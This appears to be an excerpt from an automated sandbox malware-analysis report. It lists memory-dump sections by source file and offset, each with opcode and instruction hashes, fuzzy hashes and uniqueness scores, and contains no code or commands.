                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000011.00000002.2369444250.00000000001CD000.00000040.00000001.sdmp, Offset: 001CD000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ec799b31439ad4dffa39a10557cba4316f672b729fa2368ebc05d612c7f42a55
                                                                                        • Instruction ID: 466231278a09c71a39f870c4112f792b9804f6353712c4092f34da31dac7cd22
                                                                                        • Opcode Fuzzy Hash: ec799b31439ad4dffa39a10557cba4316f672b729fa2368ebc05d612c7f42a55
                                                                                        • Instruction Fuzzy Hash: 7F2192754083809FCB02CF14E994B15BF71EB56314F28C5EAD8498F257C33AD816CB62
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000011.00000002.2369385676.00000000001BD000.00000040.00000001.sdmp, Offset: 001BD000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2372c7e24438e936b3656848934a6468347ed61495e5ffa1d129e9f53f4beb57
                                                                                        • Instruction ID: 349daa64f38e03cfc6482ea5eb408eb1b867f1e56f799baa3ddd34a6c255e6c8
                                                                                        • Opcode Fuzzy Hash: 2372c7e24438e936b3656848934a6468347ed61495e5ffa1d129e9f53f4beb57
                                                                                        • Instruction Fuzzy Hash: ED11E676404280CFCF16CF14E9C4B56BF72FB95324F24C6A9D8094B216D336D856CBA2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000011.00000002.2369385676.00000000001BD000.00000040.00000001.sdmp, Offset: 001BD000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2372c7e24438e936b3656848934a6468347ed61495e5ffa1d129e9f53f4beb57
                                                                                        • Instruction ID: b96ec1917dab03b6fb62e18245d0b2f1cd25a676673058963b4aa311fdbf626f
                                                                                        • Opcode Fuzzy Hash: 2372c7e24438e936b3656848934a6468347ed61495e5ffa1d129e9f53f4beb57
                                                                                        • Instruction Fuzzy Hash: 3811E676504284CFCF16CF10E9C4B56BF72FB94324F24C6A9D8094B216C336D856CBA2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000011.00000002.2369540610.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: dcbd4d94fbeee140c3ce01fec0a27190769bc1b01dc3bc7d69e7d637d89885de
                                                                                        • Instruction ID: ad8f1e5302320cda03ed16b16091e9152897480aceb875f487d5510f399b6158
                                                                                        • Opcode Fuzzy Hash: dcbd4d94fbeee140c3ce01fec0a27190769bc1b01dc3bc7d69e7d637d89885de
                                                                                        • Instruction Fuzzy Hash: 0D016275B206525BCB30CE2DD4C0B2AB3D6E76A320F248926E81AC7F51C376EC718B55
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000011.00000002.2369540610.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ab1d32db673b2a3abc025dcce11e9557e8108887edbed96d9e152772dba74265
                                                                                        • Instruction ID: 2aee3e90d41e621e99bcb833b0fb4415cabdb15dee5a8763b4ef51272725c64d
                                                                                        • Opcode Fuzzy Hash: ab1d32db673b2a3abc025dcce11e9557e8108887edbed96d9e152772dba74265
                                                                                        • Instruction Fuzzy Hash: 44F0A931328014AB8200A6ADA059AAE32ABCFC6324F140879E0069B390DF61EC1293E2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000011.00000002.2369540610.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: caac48c453e00986f8b4d9989c0ce9a725e1796006862a27664b2a0289713107
                                                                                        • Instruction ID: 27476e889bc819a2d0f5943dfa821e621ccc8f12446fbef7452ea8e05e9f64c1
                                                                                        • Opcode Fuzzy Hash: caac48c453e00986f8b4d9989c0ce9a725e1796006862a27664b2a0289713107
                                                                                        • Instruction Fuzzy Hash: A8E072B2F0A218AFCB206FB09C040DEF7A5DF9221871606BFC02283381DF31840A83A0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000011.00000002.2369540610.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0a8aa9e4365f5c41ea00b0faf0f879338008dd216a8edefb6c37b29d352f8f7c
                                                                                        • Instruction ID: 402295ccfadfe5509e888bce45f6244a74177dfd4ba9326237d0be8dc3c09cb1
                                                                                        • Opcode Fuzzy Hash: 0a8aa9e4365f5c41ea00b0faf0f879338008dd216a8edefb6c37b29d352f8f7c
                                                                                        • Instruction Fuzzy Hash: BBD05E34B403068FD304CA699809B26B3DB5784304F04C061E508C7350FE31DC608A00
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Non-executed Functions

                                                                                        Executed Functions

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000012.00000002.2336246501.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: KDBM
                                                                                        • API String ID: 0-3504354710
                                                                                        • Opcode ID: 89907a9c6ce6ac16e9c3c6d4de517f13253da27e7b4d6855e93d29382f9c0417
                                                                                        • Instruction ID: 623c1cbc8b30a35babdeb68195af2f5226a0b2e51188d26cdedb5ae23ad49aeb
                                                                                        • Opcode Fuzzy Hash: 89907a9c6ce6ac16e9c3c6d4de517f13253da27e7b4d6855e93d29382f9c0417
                                                                                        • Instruction Fuzzy Hash: 19A149749106099FC745EBE4F95CA8D3BBAEF89318F10C829E10A972A4CF7055CACF61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000012.00000002.2336246501.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Dk'
                                                                                        • API String ID: 0-2882665225
                                                                                        • Opcode ID: 53b213620198721431a170e35e77b6e8b96f1c7f93c1b79ec2e6fbe9c8b619b3
                                                                                        • Instruction ID: 639db2976d8db02a2146be2602cc1e54fad031f61356a1f23a878aae19490a4e
                                                                                        • Opcode Fuzzy Hash: 53b213620198721431a170e35e77b6e8b96f1c7f93c1b79ec2e6fbe9c8b619b3
                                                                                        • Instruction Fuzzy Hash: F9410034A14109DFC701DBA4D898AAEBBF6EF99300F20C9B6D605CB255D630DD52CB81
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000012.00000002.2336246501.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9888954f7410b5b58ee7d8736bd1ac53e197ed69c4fb1ac7821cf869e7d8e1bd
                                                                                        • Instruction ID: c2dc75184edd695f73aaef37b4f46ea53f017c8c177f05dc41a4e93f9233a923
                                                                                        • Opcode Fuzzy Hash: 9888954f7410b5b58ee7d8736bd1ac53e197ed69c4fb1ac7821cf869e7d8e1bd
                                                                                        • Instruction Fuzzy Hash: 7F61CB30B5D3858FD302DB749824A657FB68B86344F4984FBE245CF2A7E626CC298712
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000012.00000002.2336246501.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a84bde9778dde3b8b2787e408458df005467ce8a43ea3c35b55f67faadc6cac6
                                                                                        • Instruction ID: 1c9c6247ab71fee83c0bcacd5148ce52c18bad908789df225258e49eca806d66
                                                                                        • Opcode Fuzzy Hash: a84bde9778dde3b8b2787e408458df005467ce8a43ea3c35b55f67faadc6cac6
                                                                                        • Instruction Fuzzy Hash: 8D21833071060ADBDB348D59D4C0736F396E7593A0FA4893AEA5EC7B50C725EC718741
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000012.00000002.2336155723.000000000027D000.00000040.00000001.sdmp, Offset: 0027D000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 900aca61842b7c9c4689b5959fd711948e7d685ed38fa11beb12a330b67973a7
                                                                                        • Instruction ID: b1284e7a8e7e314e6fc1708087b45b7dfb863a392e09ebd36410171e36fabd46
                                                                                        • Opcode Fuzzy Hash: 900aca61842b7c9c4689b5959fd711948e7d685ed38fa11beb12a330b67973a7
                                                                                        • Instruction Fuzzy Hash: 7A21F275614244DFCB14DF24D884B26BBB5EF84324F24C969E80E4B246C37AD867CBA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000012.00000002.2336155723.000000000027D000.00000040.00000001.sdmp, Offset: 0027D000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 85f3ea7533f454ea3dfda4eee95c2723e638c6593e122a759268d464a803e469
                                                                                        • Instruction ID: 3b9775d715f831301ad95a6cdee77ecf7c56c4f93942c53c38bbf22ada23fa31
                                                                                        • Opcode Fuzzy Hash: 85f3ea7533f454ea3dfda4eee95c2723e638c6593e122a759268d464a803e469
                                                                                        • Instruction Fuzzy Hash: B8215B755093C08FCB12CF24D994B15BF71EF46314F28C5EAD8498B6A7C33A981ACB62
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000012.00000002.2336246501.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 09c44a2d4b1fa9d747b1067644c58664e5c75f94273b0c748ed65af2e1a72d79
                                                                                        • Instruction ID: 84247ae62abfcd7d87ee3f61b46be045b07efb50de3e0af0e6040d0c663432c4
                                                                                        • Opcode Fuzzy Hash: 09c44a2d4b1fa9d747b1067644c58664e5c75f94273b0c748ed65af2e1a72d79
                                                                                        • Instruction Fuzzy Hash: 3EF0ED303340089BC200E6BDE014AAF72DFCFC6724B144839E10A8B3A1DE61EC2693E2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Non-executed Functions